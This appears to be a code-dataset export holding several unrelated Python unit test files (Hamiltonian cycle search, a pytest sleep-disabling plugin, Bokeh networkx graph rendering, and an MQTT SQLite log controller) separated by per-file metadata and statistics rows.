# | 1 --o 4 |
# | o o |
# | / \ o
# 2 o---------- 3
class TestHamiltonianCycleDirected(unittest.TestCase):
def setUp(self):
# 3-prism graph, Halin graph
self.N = 6 # number of nodes
self.G = Graph(self.N, directed=True)
self.nodes = range(self.N)
self.edges = [
Edge(0, 1), Edge(2, 0), Edge(0, 5), Edge(2, 1),
Edge(1, 4), Edge(3, 2), Edge(3, 4), Edge(5, 3), Edge(4, 5)]
for node in self.nodes:
self.G.add_node(node)
for edge in self.edges:
self.G.add_edge(edge)
def test_hamilton(self):
algorithm = HamiltonianCycleDFS(self.G)
algorithm.run(0)
expected_cycle = [0, 1, 4, 5, 3, 2, 0]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_edges(self):
algorithm = HamiltonianCycleDFSWithEdges(self.G)
algorithm.run(0)
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5),
Edge(5, 3), Edge(3, 2), Edge(2, 0)]
self.assertEqual(algorithm.hamiltonian_cycle, expected_cycle)
def test_hamilton_with_cycle_graph(self):
algorithm = HamiltonianCycleDFSWithGraph(self.G)
algorithm.run(0)
# 5 solutions
expected_cycle = [
Edge(0, 1), Edge(1, 4), Edge(4, 5),
Edge(5, 3), Edge(3, 2), Edge(2, 0)]
#print "directed", list(algorithm.hamiltonian_cycle.iteredges())
for edge in expected_cycle:
self.assertTrue(algorithm.hamiltonian_cycle.has_edge(edge))
def tearDown(self): pass
if __name__ == "__main__":
unittest.main()
# EOF
| 31.690265
| 74
| 0.569394
| 465
| 3,581
| 4.277419
| 0.144086
| 0.030166
| 0.100553
| 0.030166
| 0.825038
| 0.819507
| 0.819507
| 0.804927
| 0.804927
| 0.793364
| 0
| 0.048877
| 0.291539
| 3,581
| 112
| 75
| 31.973214
| 0.73512
| 0.129573
| 0
| 0.777778
| 0
| 0
| 0.002586
| 0
| 0
| 0
| 0
| 0
| 0.083333
| 1
| 0.138889
| false
| 0.027778
| 0.055556
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcd12628eba46749fed36e7c829ef0029b0eb1e8
| 1,240
|
py
|
Python
|
example/tests/test_imports.py
|
DKorytkin/pytest-never-sleep
|
e655fbff4d51b8a7e41a56e584dae55013f7160f
|
[
"MIT"
] | null | null | null |
example/tests/test_imports.py
|
DKorytkin/pytest-never-sleep
|
e655fbff4d51b8a7e41a56e584dae55013f7160f
|
[
"MIT"
] | 2
|
2021-05-19T07:55:13.000Z
|
2021-05-21T09:49:05.000Z
|
example/tests/test_imports.py
|
DKorytkin/pytest-never-sleep
|
e655fbff4d51b8a7e41a56e584dae55013f7160f
|
[
"MIT"
] | null | null | null |
import time
import pytest
from diff_imports.import_from_module import do_some_stuff
def test_without_mark_and_fixture():
do_some_stuff() # pass if without --disable-sleep
@pytest.mark.usefixtures("disable_time_sleep")
def test_disable_time_sleep_fixture(do):
assert do is None # error
@pytest.mark.usefixtures("enable_time_sleep")
def test_enable_time_sleep_fixture(do):
assert do is None # pass
@pytest.mark.disable_time_sleep
def test_disable_time_sleep_mark():
time.sleep(1) # unstable
@pytest.mark.enable_time_sleep
def test_enable_time_sleep_mark():
time.sleep(1) # pass
class TestClass(object):
def test_without_mark_and_fixture(self):
do_some_stuff() # pass if without --disable-sleep
@pytest.mark.usefixtures("disable_time_sleep")
def test_disable_time_sleep_fixture(self, do):
assert do is None # error
@pytest.mark.usefixtures("enable_time_sleep")
def test_enable_time_sleep_fixture(self, do):
assert do is None # pass
@pytest.mark.disable_time_sleep
def test_disable_time_sleep_mark(self):
time.sleep(1) # unstable
@pytest.mark.enable_time_sleep
def test_enable_time_sleep_mark(self):
time.sleep(1) # pass
| 24.8
| 58
| 0.742742
| 182
| 1,240
| 4.703297
| 0.175824
| 0.21028
| 0.149533
| 0.149533
| 0.880841
| 0.880841
| 0.803738
| 0.78271
| 0.78271
| 0.773364
| 0
| 0.003887
| 0.170161
| 1,240
| 49
| 59
| 25.306122
| 0.827988
| 0.091129
| 0
| 0.5625
| 0
| 0
| 0.062724
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.3125
| false
| 0
| 0.09375
| 0
| 0.4375
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bce50394f4967df79059e46b924c303b35172e4e
| 7,785
|
py
|
Python
|
tests/unit/bokeh/plotting/test_graph.py
|
samwill/bokeh
|
228132eba4b696b91b2a77f7e9d07771ba868093
|
[
"BSD-3-Clause"
] | 1
|
2021-05-03T15:19:05.000Z
|
2021-05-03T15:19:05.000Z
|
tests/unit/bokeh/plotting/test_graph.py
|
samwill/bokeh
|
228132eba4b696b91b2a77f7e9d07771ba868093
|
[
"BSD-3-Clause"
] | 3
|
2021-09-08T03:16:42.000Z
|
2022-03-12T00:57:18.000Z
|
tests/unit/bokeh/plotting/test_graph.py
|
samwill/bokeh
|
228132eba4b696b91b2a77f7e9d07771ba868093
|
[
"BSD-3-Clause"
] | 2
|
2021-01-12T18:22:24.000Z
|
2021-10-30T00:32:02.000Z
|
#-----------------------------------------------------------------------------
# Copyright (c) 2012 - 2020, Anaconda, Inc., and Bokeh Contributors.
# All rights reserved.
#
# The full license is in the file LICENSE.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Boilerplate
#-----------------------------------------------------------------------------
import pytest ; pytest
#-----------------------------------------------------------------------------
# Imports
#-----------------------------------------------------------------------------
# External imports
import networkx as nx
import numpy as np
from numpy.testing import assert_allclose
# Module under test
import bokeh.plotting.graph as bpg # isort:skip
#-----------------------------------------------------------------------------
# Setup
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# General API
#-----------------------------------------------------------------------------
def test_from_networkx_method() -> None:
G=nx.Graph()
G.add_nodes_from([0,1,2,3])
G.add_edges_from([[0,1], [0,2], [2,3]])
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0,1,2,3]
assert renderer.edge_renderer.data_source.data["start"] == [0,0,2]
assert renderer.edge_renderer.data_source.data["end"] == [1,2,3]
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1, 2, 3}
assert_allclose(gl[0], np.array([1.0, 0.0]), atol=1e-7)
def test_from_networkx_method_with_kwargs() -> None:
G=nx.Graph()
G.add_nodes_from([0,1,2,3])
G.add_edges_from([[0,1], [0,2], [2,3]])
renderer = bpg.from_networkx(G, nx.circular_layout, scale=2)
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1, 2, 3}
assert_allclose(gl[0], np.array([2.0, 0.0]), atol=1e-7)
def test_from_networkx_with_scalar_attributes() -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"attr_1": "a", "attr_2": 10}),
(1, {"attr_1": "b"}),
(2, {"attr_1": "c", "attr_2": 30})])
G.add_edges_from([(0, 1, {"attr_1": "A"}),
(0, 2, {"attr_1": "B", "attr_2": 10})])
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1, 2]
assert renderer.node_renderer.data_source.data["attr_1"] == ["a", "b", "c"]
assert renderer.node_renderer.data_source.data["attr_2"] == [10, None, 30]
assert renderer.edge_renderer.data_source.data["start"] == [0, 0]
assert renderer.edge_renderer.data_source.data["end"] == [1, 2]
assert renderer.edge_renderer.data_source.data["attr_1"] == ["A", "B"]
assert renderer.edge_renderer.data_source.data["attr_2"] == [None, 10]
@pytest.mark.parametrize('typ', [list, tuple])
def test_from_networkx_with_sequence_attributes(typ) -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"attr_1": typ([1, 2]), "attr_2": 10}),
(1, {}),
(2, {"attr_1": typ([3]), "attr_2": 30})])
G.add_edges_from([(0, 1, {"attr_1": typ([1, 11])}),
(0, 2, {"attr_1": typ([2, 22]), "attr_2": 10})])
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1, 2]
assert renderer.node_renderer.data_source.data["attr_1"] == [[1, 2], [], [3]]
assert renderer.node_renderer.data_source.data["attr_2"] == [10, None, 30]
assert renderer.edge_renderer.data_source.data["start"] == [0, 0]
assert renderer.edge_renderer.data_source.data["end"] == [1, 2]
assert renderer.edge_renderer.data_source.data["attr_1"] == [[1, 11], [2, 22]]
assert renderer.edge_renderer.data_source.data["attr_2"] == [None, 10]
def test_from_networkx_errors_with_mixed_attributes() -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"attr_1": [1, 2], "attr_2": 10}),
(1, {}),
(2, {"attr_1": 3, "attr_2": 30})])
with pytest.raises(ValueError):
bpg.from_networkx(G, nx.circular_layout)
G = nx.Graph()
G.add_edges_from([(0, 1, {"attr_1": [1, 11]}),
(0, 2, {"attr_1": 2, "attr_2": 10})])
with pytest.raises(ValueError):
bpg.from_networkx(G, nx.circular_layout)
def test_from_networkx_with_bad_attributes() -> None:
G = nx.Graph()
G.add_nodes_from([(0, {"index": "a", "attr_1": 10}),
(1, {"index": "b", "attr_1": 20})])
G.add_edges_from([[0, 1]])
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1]
assert renderer.node_renderer.data_source.data["attr_1"] == [10, 20]
G = nx.Graph()
G.add_nodes_from([0, 1])
G.add_edges_from([(0, 1, {"start": "A", "attr_1": 10})])
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.edge_renderer.data_source.data["start"] == [0]
assert renderer.edge_renderer.data_source.data["end"] == [1]
assert renderer.edge_renderer.data_source.data["attr_1"] == [10]
G = nx.Graph()
G.add_nodes_from([0, 1])
G.add_edges_from([(0, 1, {"end": "A", "attr_1": 10})])
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, nx.circular_layout)
assert renderer.edge_renderer.data_source.data["start"] == [0]
assert renderer.edge_renderer.data_source.data["end"] == [1]
assert renderer.edge_renderer.data_source.data["attr_1"] == [10]
def test_from_networkx_fixed_layout() -> None:
G = nx.Graph()
G.add_nodes_from([0, 1, 2])
G.add_edges_from([[0, 1], [0, 2]])
fixed_layout = {0: [0, 1],
1: [-1, 0],
2: [1, 0]}
renderer = bpg.from_networkx(G, fixed_layout)
assert renderer.node_renderer.data_source.data["index"] == [0, 1, 2]
assert renderer.edge_renderer.data_source.data["start"] == [0, 0]
assert renderer.edge_renderer.data_source.data["end"] == [1, 2]
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1, 2}
assert renderer.layout_provider.graph_layout[0] == fixed_layout[0]
assert renderer.layout_provider.graph_layout[1] == fixed_layout[1]
assert renderer.layout_provider.graph_layout[2] == fixed_layout[2]
def test_from_networkx_with_missing_layout() -> None:
G = nx.Graph()
G.add_nodes_from([0, 1, 2])
G.add_edges_from([[0, 1], [0, 2]])
missing_fixed_layout = {0: [0, 1],
1: [-1, 0]}
with pytest.warns(UserWarning):
renderer = bpg.from_networkx(G, missing_fixed_layout)
gl = renderer.layout_provider.graph_layout
assert set(gl.keys()) == {0, 1}
assert renderer.layout_provider.graph_layout[0] == missing_fixed_layout[0]
assert renderer.layout_provider.graph_layout[1] == missing_fixed_layout[1]
#-----------------------------------------------------------------------------
# Dev API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Private API
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Code
#-----------------------------------------------------------------------------
| 40.546875
| 82
| 0.521516
| 969
| 7,785
| 3.957688
| 0.110423
| 0.120469
| 0.131421
| 0.160626
| 0.837027
| 0.788787
| 0.779661
| 0.747327
| 0.731943
| 0.698827
| 0
| 0.042286
| 0.170713
| 7,785
| 191
| 83
| 40.759162
| 0.551735
| 0.193449
| 0
| 0.516667
| 0
| 0
| 0.052808
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.066667
| false
| 0
| 0.041667
| 0
| 0.108333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcf5ffcfdeb94429ea3d58dd16faadca39d534cf
| 20,280
|
py
|
Python
|
tests/test_logs.py
|
poleguy/mqttSqlLite
|
3041e01a05639274621767dcdbe16035657b1bc5
|
[
"MIT"
] | 14
|
2017-08-29T02:51:19.000Z
|
2021-08-19T01:25:52.000Z
|
tests/test_logs.py
|
poleguy/mqttSqlLite
|
3041e01a05639274621767dcdbe16035657b1bc5
|
[
"MIT"
] | 1
|
2020-05-05T10:05:21.000Z
|
2020-05-06T12:40:57.000Z
|
tests/test_logs.py
|
poleguy/mqttSqlLite
|
3041e01a05639274621767dcdbe16035657b1bc5
|
[
"MIT"
] | 5
|
2019-10-29T00:49:24.000Z
|
2021-03-19T16:37:30.000Z
|
import unittest
from playhouse.test_utils import test_database
from peewee import *
from datetime import datetime, timedelta
from mqttsqlite.orm.models import Log, Topic
from tests.utils import msg
from mqttsqlite.core.logs_controller import LogController
import mqttsqlite.settings.private_settings as Settings
import json
test_db = SqliteDatabase('test_database.db')
class TestLogsController(unittest.TestCase):
def setUp(self):
self.payload = {}
self.payload['client'] = 'testClient'
self.payload['password'] = Settings.QUERY_PASSWORD
self.payload['topic'] = '/test/topic'
self.payload['options'] = '25'
self.msg = msg(topic=Settings.ROOT_TOPIC + '/topics/add', payload=json.dumps(self.payload))
def test_add_log_entry_response_ok(self):
message = msg(topic='/test/home/sensor', payload='123445')
with test_database(test_db, (Log, Topic), create_tables=True):
logs = LogController()
result = logs.add_entry(message)
parsedResponse = json.loads(result)
self.assertEqual('OK', parsedResponse['result'])
def test_add_log_entry(self):
with test_database(test_db, (Log, Topic), create_tables=True):
message = msg(topic='/test/home/sensor', payload='123445')
logs = LogController()
result = logs.add_entry(message)
parsedResponse = json.loads(result)
self.assertEqual('OK', parsedResponse['result'])
self.assertEqual(1, Log.select().count())
def test_private_method_get_log_newer_than(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=60), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=50), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=40), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_logs_newer_than('/test/topic', 25)
self.assertEqual(2, len(query_result))
def test_private_method_get_log_from_desired_topic_newer_than(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_logs_newer_than('/test/topic', 25)
self.assertEqual(2, len(query_result))
def test_private_method_get_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
Log.create(timestamp=datetime.now(), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now(), value="12", topic='/test/topic3')
logs = LogController()
query_result = logs._LogController__get_last_entry_from_topic('/test/topic')
self.assertEqual(timestamp.strftime("%Y-%m-%d %H:%M:%S"), query_result['timestamp'])
def test_private_method_get_last_entry_from_invalid_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_last_entry_from_topic('/test/topic3')
self.assertEqual({}, query_result)
def test_private_method_get_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
logs = LogController()
query_result = logs._LogController__get_last_entry_from_topic('/test/topic')
self.assertEqual(timestamp.strftime("%Y-%m-%d %H:%M:%S"), query_result['timestamp'])
def test_get_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/last'
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
timestamp = datetime.now()
Log.create(timestamp=timestamp, value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(timestamp.strftime("%Y-%m-%d %H:%M:%S"), dic_result['values'][0]['timestamp'])
def test_get_entries_newer_than_25_minutes(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/minutes'
Log.create(timestamp=datetime.now() - timedelta(minutes=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(minutes=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(2, len(dic_result['values']))
def test_get_entries_newer_than_25_hours(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/hours'
Log.create(timestamp=datetime.now() - timedelta(hours=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(hours=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(2, len(dic_result['values']))
def test_get_entries_newer_than_25_days(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(2, len(dic_result['values']))
def test_get_entries_newer_than_25_days_invalid_password(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
self.payload['password'] = 'badPassword'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('KO', dic_result['result'])
self.assertFalse('values' in dic_result)
def test_get_entries_newer_than_25_days_invalid_options(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
self.payload['options'] = 'invalidOptions'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('KO', dic_result['result'])
self.assertFalse('values' in dic_result)
def test_get_entries_newer_than_25_days_invalid_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/log/days'
self.payload['topic'] = '/test/invalid/topic'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic2')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.get_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('OK', dic_result['result'])
self.assertFalse('values' in dic_result)
def test_private_method_delete_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_last_entry_from_topic('/test/topic')
self.assertTrue(result)
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_private_method_delete_last_entry_from_non_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_last_entry_from_topic('/test/topic2')
self.assertTrue(result)
data_after_delete = Log.select()
self.assertEqual(3, data_after_delete.count())
def test_private_method_delete_entries_older_than_from_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=50), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=40), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_entries_from_topic_older_than('/test/topic', 25)
self.assertEqual(3, result)
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_private_method_delete_entries_older_than_from_non_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
Log.create(timestamp=datetime.now() - timedelta(seconds=50), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=40), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
result = logs._LogController__delete_entries_from_topic_older_than('/test/topic2', 25)
self.assertEqual('0', result)
data_after_delete = Log.select()
self.assertEqual(5, data_after_delete.count())
def test_delete_last_entry_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/last'
Log.create(timestamp=datetime.now() - timedelta(seconds=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(seconds=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertTrue(dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_minutes_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/minutes'
Log.create(timestamp=datetime.now() - timedelta(minutes=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(minutes=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(1, dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_hours_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/hours'
Log.create(timestamp=datetime.now() - timedelta(hours=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(hours=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(1, dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_days_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/days'
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual(1, dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(2, data_after_delete.count())
def test_delete_older_than_x_days_from_non_existing_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/days'
self.payload['topic'] = '/test/invalid/topic'
self.msg.payload = json.dumps(self.payload)
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('0', dic_result['values'])
data_after_delete = Log.select()
self.assertEqual(3, data_after_delete.count())
def test_delete_older_than_x_invalid_unit_time_from_topic(self):
with test_database(test_db, (Log, Topic), create_tables=True):
self.msg.topic = Settings.ROOT_TOPIC + '/delete/years'
Log.create(timestamp=datetime.now() - timedelta(days=30), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=20), value="12", topic='/test/topic')
Log.create(timestamp=datetime.now() - timedelta(days=10), value="12", topic='/test/topic')
logs = LogController()
query_result = logs.delete_topic_entries(self.msg)
dic_result = json.loads(query_result)
self.assertEqual('KO', dic_result['result'])
if __name__ == '__main__':
unittest.main()
| 63.17757
| 107
| 0.649556
| 2,491
| 20,280
| 5.101967
| 0.047371
| 0.067983
| 0.121803
| 0.10827
| 0.939098
| 0.931781
| 0.927768
| 0.923047
| 0.908883
| 0.907074
| 0
| 0.024958
| 0.201824
| 20,280
| 320
| 108
| 63.375
| 0.760178
| 0
| 0
| 0.758621
| 0
| 0
| 0.088515
| 0
| 0
| 0
| 0
| 0
| 0.127586
| 1
| 0.086207
| false
| 0.010345
| 0.031034
| 0
| 0.12069
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bcf8290baccdc77a13495b58d0e847598e72ca32
| 78
|
py
|
Python
|
function/python_3_9/src/error/__init__.py
|
aws-samples/amazon-s3-object-lambda-default-configuration
|
3908515d48d5e42fd9bb6dadc1dc9fe5132a1425
|
[
"MIT-0"
] | 13
|
2021-11-23T17:07:13.000Z
|
2022-03-08T16:57:45.000Z
|
function/python_3_9/src/error/__init__.py
|
aws-samples/amazon-s3-object-lambda-default-configuration
|
